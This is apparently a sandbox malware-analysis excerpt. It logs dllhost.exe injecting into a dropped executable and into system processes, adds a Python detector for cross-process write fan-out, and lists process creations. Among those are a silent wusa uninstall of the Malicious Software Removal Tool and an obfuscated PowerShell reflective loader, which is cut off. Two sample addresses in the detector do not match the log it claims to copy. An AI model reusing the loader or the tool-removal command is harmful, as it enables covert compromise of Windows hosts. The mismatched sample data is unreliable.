          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2620000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2F20000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2940000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: FF0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2560000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2880000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2E50000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3110000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EF0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: C00000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: D70000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 25D0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2B40000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 7F0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 6E0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2890000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: EB0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2FC0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 27F0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 13C0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 7E0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: A30000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 740000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2820000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3030000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 700000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 1110000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2C90000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2AF0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: D60000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2A20000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EB0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: B60000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 14A0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2FB0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3130000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 900000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 900000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2C30000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 30F0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 10B0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 23D0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2860000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2BC0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 7B0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2650000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EF0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 750000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2AB0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 1620000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2B80000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 15A0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 8A0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 24D0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 12A0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2110000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 6F0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: BE0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 25B0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: F20000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3070000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: E10000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2980000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EC0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3110000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2150000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2910000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3140000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2D20000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 730000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2CD0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: BC0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2730000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2AF0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2360000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3030000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 13D0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2FC0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 1510000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 8B0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: F70000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 730000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 7E0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F6E6AB0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 217D6390000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 1D29E890000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28189530000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 146F6AD0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dllhost.exe base: 1BF4B840000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dllhost.exe base: 208BF760000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 23B50E40000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 23B50E70000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CCD9A60000
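The "Memory written" rows above show a single dllhost.exe instance writing into the dropped binary under Program Files (x86) at 88 different base addresses and then into WmiPrvSE.exe, powershell.exe, conhost.exe, a second dllhost.exe, WMIADAP.exe and svchost.exe. Read as telemetry rather than as a report, that is the signature of one process spraying code across many others. The script below is an added example, not Joe Sandbox output or code: it takes cross-process write events (source image, target image, base) and applies three heuristics that are assumptions for the example, not the sandbox's own logic: a writer that touches several distinct target images, writes into system images that ordinary software has no reason to patch, and a writer image (the COM surrogate) that should not be writing other processes at all. The sample events are constructed here from the rows above plus one made-up benign control, a debugger writing into its own debuggee, so the script runs offline. On a live host the equivalent input is an EDR's WriteProcessMemory/NtWriteVirtualMemory event or, with Sysmon, Event ID 10 (ProcessAccess) filtered on a GrantedAccess that includes PROCESS_VM_WRITE (0x20) and PROCESS_VM_OPERATION (0x8).

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class MemWrite:
    """One cross-process write: which image wrote, into which image, at which base."""
    source: str
    target: str
    base: int


# Constructed sample. The first nine entries copy "Memory written" rows from the
# report above (three of the 88 writes into the dropped binary, then one write per
# system target); the last entry is a made-up benign control, a debugger writing
# into its own debuggee, which must not raise an alert.
DROPPED = (r"C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ"
           r"\ZbdOtWCbFZADO.exe")
DLLHOST = r"C:\Windows\System32\dllhost.exe"
SAMPLE_WRITES = [
    MemWrite(DLLHOST, DROPPED, 0x2EB0000),
    MemWrite(DLLHOST, DROPPED, 0x26E0000),
    MemWrite(DLLHOST, DROPPED, 0x22C0000),
    MemWrite(DLLHOST, r"C:\Windows\System32\wbem\WmiPrvSE.exe", 0x1F6E6AB0000),
    MemWrite(DLLHOST, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", 0x217D6390000),
    MemWrite(DLLHOST, r"C:\Windows\System32\conhost.exe", 0x1D29E890000),
    MemWrite(DLLHOST, r"C:\Windows\System32\dllhost.exe", 0x1BF4B840000),
    MemWrite(DLLHOST, r"C:\Windows\System32\wbem\WMIADAP.exe", 0x23B50E40000),
    MemWrite(DLLHOST, r"C:\Windows\System32\svchost.exe", 0x1CCD9A60000),
    MemWrite(r"C:\Tools\debugger.exe", r"C:\Users\user\app_under_test.exe", 0x400000),
]

# Heuristics. The lists and threshold are assumptions for this example, not
# Joe Sandbox's detection logic; tune them against your own baseline.
SENSITIVE_TARGETS = {"svchost.exe", "wmiprvse.exe", "wmiadap.exe", "powershell.exe",
                     "conhost.exe", "explorer.exe", "lsass.exe", "winlogon.exe"}
UNLIKELY_WRITERS = {"dllhost.exe"}  # COM surrogate: hosts DLLs, has no reason to patch other processes
FANOUT_THRESHOLD = 3                # distinct target images before a writer counts as "spraying"


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def summarize(writes):
    """Map source image -> target image -> set of distinct bases written."""
    by_source = defaultdict(lambda: defaultdict(set))
    for w in writes:
        by_source[image_name(w.source)][image_name(w.target)].add(w.base)
    return by_source


def detect(writes, fanout_threshold=FANOUT_THRESHOLD):
    """Return (rule, source image, sorted target images) for every rule that fires."""
    alerts = []
    for src, targets in summarize(writes).items():
        if len(targets) >= fanout_threshold:
            alerts.append(("fan-out", src, sorted(targets)))
        hit = sorted(t for t in targets if t in SENSITIVE_TARGETS)
        if hit:
            alerts.append(("sensitive-target", src, hit))
        if src in UNLIKELY_WRITERS:
            alerts.append(("unlikely-writer", src, sorted(targets)))
    return alerts


if __name__ == "__main__":
    for rule, src, targets in detect(SAMPLE_WRITES):
        print(f"{rule:17} {src:12} -> {', '.join(targets)}")
```

Against the sample, dllhost.exe trips all three rules (seven distinct targets, five of them on the sensitive list) while the debugger trips none. The fan-out rule is the one that generalises: the specific images change from sample to sample, but a process that writes into more than a couple of unrelated images in a short window is almost never doing so legitimately.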
          Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ed3c9ad9-1a05-4753-a177-d35f4db59610}
          Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\dialer.exe dialer.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{221f05ee-8fb0-4424-9ba0-bc3ff8f1bf74}
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:okulrfyuhqtj{param([outputtype([type])][parameter(position=0)][type[]]$dhhelpdherwtsc,[parameter(position=1)][type]$rguqrffami)$xkbdjiiiaov=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+'e'+[char](102)+''+[char](108)+''+'e'+''+'c'+'t'+'e'+''+[char](100)+''+[char](68)+''+[char](101)+''+'l'+''+[char](101)+''+'g'+''+'a'+'t'+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+''+[char](110)+''+[char](77)+''+[char](101)+''+[char](109)+'o'+[char](114)+'ymo'+'d'+''+[char](117)+''+[char](108)+''+[char](101)+'',$false).definetype('my'+'d'+'el'+[char](101)+''+[char](103)+'a'+'t'+''+'e'+''+[char](84)+'yp'+[char](101)+'',''+[char](67)+''+[char](108)+''+'a'+'ss'+[char](44)+'pu'+'b'+'l'+[char](105)+''+[char](99)+''+','+''+[char](83)+''+'e'+'a'+'l'+''+'e'+'d,'+[char](65)+'ns'+'i'+''+[char](67)+''+[char](108)+'as'+[char](115)+''+[char](44)+''+[char](65)+''+'u'+''+[char](116)+''+'o'+''+[char](67)+''+[char](108)+''+'a'+''+'s'+'s',[multicastdelegate]);$xkbdjiiiaov.defineconstructor(''+[char](82)+''+[char](84)+''+'s'+''+[char](112)+''+[char](101)+'c'+[char](105)+''+'a'+''+[char](108)+''+[char](78)+''+[char](97)+''+'m'+'e,'+'h'+'i'+[char](100)+''+[char](101)+''+[char](66)+'y'+[char](83)+''+[char](105)+'g'+[char](44)+'p'+[char](117)+'b'+'l'+''+[char](105)+'c',[reflection.callingconventions]::standard,$dhhelpdherwtsc).setimplementationflags(''+[char](82)+''+'u'+''+[char](110)+''+[char](116)+'i'+[char](109)+''+[char](101)+''+','+'man'+'a'+'g'+[char](101)+''+[char](100)+'');$xkbdjiiiaov.definemethod(''+[char](73)+''+[char](110)+'v'+'o'+''+[char](107)+''+[char](101)+'',''+[char](80)+''+'u'+''+[char](98)+''+[char](108)+'ic'+','+''+[char](72)+''+'i'+''+[char](100)+''+[char](101)+''+'b'+'y'+[char](83)+''+'i'+'g'+','+'n'+[char](
101)+'w'+'s'+''+[char](108)+''+[char](111)+'t'+','+''+'v'+''+[char](105)+''+[char](114)+''+'t'+''+[char](117)+''+[char](97)+''+[char](108)+'',$rguqrffami,$dhhelpdherwtsc).setimplementationflags(''+'r'+''+[char](117)+''+'n'+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+',ma'+[char](110)+''+'a'+''+[char](103)+'e'+'d'+'');write-output $xkbdjiiiaov.createtype();}$hpsmfkkdezpeo=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+'y'+'s'+''+[char](116)+''+[char](101)+''+[char](109)+''+[char](46)+''+'d'+''+[char](108)+''+[char](108)+'')}).gettype('m'+[char](105)+'c'+[char](114)+''+'o'+'s'+'o'+''+[char](102)+''+[char](116)+''+[char](46)+''+[char](87)+''+[char](105)+''+[char](110)+''+'3'+''+[char](50)+''+[char](46)+'u'+'n'+''+'s'+''+[char](97)+''+[char](102)+''+[char](101)+''+[char](78)+''+[char](97)+''+'t'+''+'i'+''+'v'+''+[char](101)+''+[char](77)+''+[char](101)+''+[char](116)+'h'+[char](111)+''+[char](100)+''+[char](115)+'');$azprwzsupdjmw
